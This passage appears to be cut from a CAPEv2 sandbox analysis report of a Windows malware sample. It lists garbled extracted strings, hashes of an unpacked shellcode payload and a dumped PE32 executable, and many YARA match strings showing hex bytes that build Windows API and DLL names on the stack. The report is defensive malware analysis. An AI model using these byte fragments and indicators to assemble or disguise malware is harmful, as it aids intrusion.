"\\}/pMID^", "6^*Co", "|*5YP", "X 8\"C", "`&*l13\"", ".Z1mbI", "oqC9&4", "D{@$C", "The ordinal %u could not be located in the dynamic link library %s", ",7N]]X", "%hb*)J", ":}u\\l", ">MIYL^O1", "''NU=o", "p2R{3]", "yu/)=", "LJD_sOz", "0o@4pw", "E}m>t", "i2d+jI", "9c}OU", "F]1$`S", "4qyR8HC", "St^e+dY", "F8!U-", "0|SP[", "JM(q<-D?U^", "ts^')5", "1.8.0_181-b13", "FsS", "BBABORT", "^Z9UB:", "j]CE&", "h>8[!", "f5M.g", "\"idZ!o", ".Curr", "VirtualProtect", "X&w@=", "1TE#Y/", "Lqwy_r{", "a |L:", "3b}IT", "OMtGQ.", "CG7LK", "ExU!V;\"", "Hl{'g", "G\"t", "|Y5uU", "c", "BBYES", "nY zJ", "z[/']W", "$=a'g8y", "6?^=]", "4ZX0O5b", "N_-6C", "SBst%", "g( ih", ".aspack", "'GFT!c", "xSxr3j", "g%$Dz", "TTJ$@", ".b/1rI", "5+rSv", "yRPK$", "h|Q+{4", "@;4T4", "H[72_", "z{AjvZSRWw", "*PH0t", "&1nK ", "3VKcR*-N", "y;oAc", "8.0.1810.13", "`K/80", "@0~Posj", "$_nmv", "-^L0\"", "R{[t9d", "{Pp`<", "2&]&h", ",p'*Q", "{BjTu", ",Pw'n", "@!S}p1", "`R\\tX/", "88)88", "wsprintfA", "ab28B", "]Ofq[", "GetProcAddress", ",Is+U`", "\"SF=+", "l ?Z ", "HsK", "!`|`|[", "cP5XJP", "7It`86", "Gdel@", "bOE;<", "T2$wye", "Zz=0'", "TUUYIUH", "$)j@cY", "X,a5rJ", "`7B9_B'", "~;;#O", "SX !)#", "fJ^d|jo", "000004b0", "~jz_WV", "PREVIEWGLYPH", "TCVe}", ")I=KcFm~L", "a,yqx", "Rsi :", "};&2'", "O{7A1", "tDTyJ", "SG^_S", "C++ R", "S5t %z1", "w~*Dk", "|2_&U", "ZvYv3", "*viON", "AEe;D_c=", "rwLvK", "argu(s_02f", "0ID[3", "3hTin1C", "w4xT6*O", "n74MW", "@(3YO", "nk3B^.", "n]Y_r", "Ga}Zk<", "LLX76s", "0_.vd", "IA[je", "%~SO?", "essageBoxA", "=Fi{4", "3x<%S", "R[#X\"~", ">U!)&z", "%0^:{", "=!>MU", "Mii[a", "p:Sw<", "XCcEO", "cdsE$F/", "T9bJS", "%00L7", "`M*~9-)2", ":IX]x", "B&3~q", "%'Xad" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "selfextract": { "overlay": { "extracted_files": [ { "name": "5a2ea55875da545a5a5ded555d3ad152c711fe105efb6dd01416cfa291266057", "path": "/opt/CAPEv2/storage/analyses/1889/selfextracted/5a2ea55875da545a5a5ded555d3ad152c711fe105efb6dd01416cfa291266057", "guest_paths": [ "overlay" ], "size": 21072, "crc32": "85110F6C", "md5": "00cc23251c3ae71c2c7552994b5587cc", "sha1": "51b2d26557a009d5c6a8c2e6eda1d4f68e7cf5bf", "sha256": "5a2ea55875da545a5a5ded555d3ad152c711fe105efb6dd01416cfa291266057", "sha512": "5402f42657f03e046a60b1d22abc11449def6c00bb667605474326095579d418eb77830d8ee90fc773d3c740b64859c9f6b0e6343d1156ff317f566df4656953", "rh_hash": null, "ssdeep": "192:BebFkV8zWKKiwkK479A9iMaBxtts0kH5jVozs/Ap2z1RenoPRmUuGEpSqvOWXJr:i6V8zgiq479/rBxA0K5Us/AowpGbeOMr", "type": "data", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T19592BF96F785E017E29D22710603C36B4DAE76A1B74AF15B723D80C73C6B6C50370AAA", "sha3_384": "ae9a95960e49a01c3eddef0f2006b9b8564ce4e4b41ee337b8eb01ee5ad791e3f2d120d28e67e54e336776bcdffe81e2", "data": null } ], "extracted_files_time": 0.0005934729706496, "password": "" } }, "cape_type_code": 9, "cape_type": "Unpacked Shellcode: 32-bit executable", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 4492, "virtual_address": "0x04970000" }, { "name": "26efa6d8a8a3bc9222199812b7d5cf2564641d2e474fbac0faa3e2777e057c5f", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/26efa6d8a8a3bc9222199812b7d5cf2564641d2e474fbac0faa3e2777e057c5f", "guest_paths": "8;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?0x05840000;?", "size": 260096, "crc32": "2993BBFD", "md5": "02862d151f500c75d64533f97072b8bd", "sha1": "6be898acf70950b32975c3e8c78bd0b23befb24b", "sha256": "26efa6d8a8a3bc9222199812b7d5cf2564641d2e474fbac0faa3e2777e057c5f", "sha512": "faedab3486dc24cb60f4d1a16d604a7b49ee144b025a25b3429e981833dfdd6cdc0f34216254dbca7b379f26e9b34a495c357c356fcc15cb1fd16f434e80b42b", "rh_hash": null, "ssdeep": "6144:NSTz3MaMNhXbyuWt2EHOO+7qeA5fphPFrKz1K5:UTy7A", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [ { "name": "shellcode_stack_strings", "meta": { "author": "William Ballenthin", "email": "william.ballenthin@fireeye.com", "license": "Apache 2.0", "copyright": "FireEye, Inc", "description": "Match x86 that appears to be stack string creation." }, "strings": [ "{ C6 45 F3 32 C6 45 F4 2E C6 45 F5 64 C6 45 F6 6C C6 45 F7 6C C6 45 F8 00 }", "{ C6 45 F4 2E C6 45 F5 64 C6 45 F6 6C C6 45 F7 6C C6 45 F8 00 }", "{ C6 45 8B 32 C6 45 8C 2E C6 45 8D 64 C6 45 8E 6C C6 45 8F 6C C6 45 90 00 }", "{ C6 45 8C 2E C6 45 8D 64 C6 45 8E 6C C6 45 8F 6C C6 45 90 00 }", "{ C6 45 B4 55 C6 45 B5 41 C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }", "{ C6 45 B5 41 C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }", "{ C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }", "{ C6 85 A0 FE FF FF 6E C6 85 A1 FE FF FF 74 C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A1 FE FF FF 74 C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 76 FE FF FF 32 C6 85 77 FE FF FF 2E C6 85 78 FE FF FF 64 C6 85 79 FE FF FF 6C C6 85 7A FE FF FF 6C C6 85 7B FE FF FF 00 }", "{ C6 85 77 FE FF FF 2E C6 85 78 FE FF FF 64 C6 85 79 FE FF FF 6C C6 85 7A FE FF FF 6C C6 85 7B FE FF FF 00 }", "{ C6 85 58 FE FF FF 70 C6 85 59 FE FF FF 73 C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 59 FE FF FF 73 C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 77 FA FF FF 32 C6 85 78 FA FF FF 53 C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 78 FA FF FF 53 C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 AC FC FF FF 32 C6 85 AD FC FF FF 46 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }", "{ C6 85 AD FC FF FF 46 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }", "{ C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }", "{ C6 85 0B FD FF FF 32 C6 85 0C FD FF FF 46 C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }", "{ C6 85 0C FD FF FF 46 C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }", "{ C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }", "{ C6 85 7D FE FF FF 6C C6 85 7E FE FF FF 6F C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 7E FE FF FF 6F C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 3F FB FF FF 6E C6 85 40 FB FF FF 49 C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 40 FB FF FF 49 C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 64 FE FF FF 45 C6 85 65 FE FF FF 71 C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 65 FE FF FF 71 C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 B0 FB FF FF 4C C6 85 B1 FB FF FF 6F C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B1 FB FF FF 6F C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 59 FB FF FF 63 C6 85 5A FB FF FF 74 C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }", "{ C6 85 5A FB FF FF 74 C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }", "{ C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }", "{ C6 85 31 FB FF FF 63 C6 85 32 FB FF FF 74 C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }", "{ C6 85 32 FB FF FF 74 C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }", "{ C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }", "{ C6 85 B1 FA FF FF 72 C6 85 B2 FA FF FF 50 C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }", "{ C6 85 B2 FA FF FF 50 C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }", "{ C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }", "{ C6 85 C9 FA FF FF 72 C6 85 CA FA FF FF 50 C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }", "{ C6 85 CA FA FF FF 50 C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }", "{ C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }", "{ C6 85 1D FD FF FF 79 C6 85 1E FD FF FF 45 C6 85 1F FD FF FF 78 C6 85 20 FD FF FF 41 C6 85 21 FD FF FF 00 }", "{ C6 85 2D FD FF FF 79 C6 85 2E FD FF FF 45 C6 85 2F FD FF FF 78 C6 85 30 FD FF FF 57 C6 85 31 FD FF FF 00 }", "{ C6 85 0B FC FF FF 74 C6 85 0C FC FF FF 6F C6 85 0D FC FF FF 72 C6 85 0E FC FF FF 79 C6 85 0F FC FF FF 57 C6 85 10 FC FF FF 00 }", "{ C6 85 0C FC FF FF 6F C6 85 0D FC FF FF 72 C6 85 0E FC FF FF 79 C6 85 0F FC FF FF 57 C6 85 10 FC FF FF 00 }", "{ C6 85 48 FD FF FF 56 C6 85 49 FD FF FF 69 C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 49 FD FF FF 69 C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 6A FD FF FF 74 C6 85 6B FD FF FF 54 C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 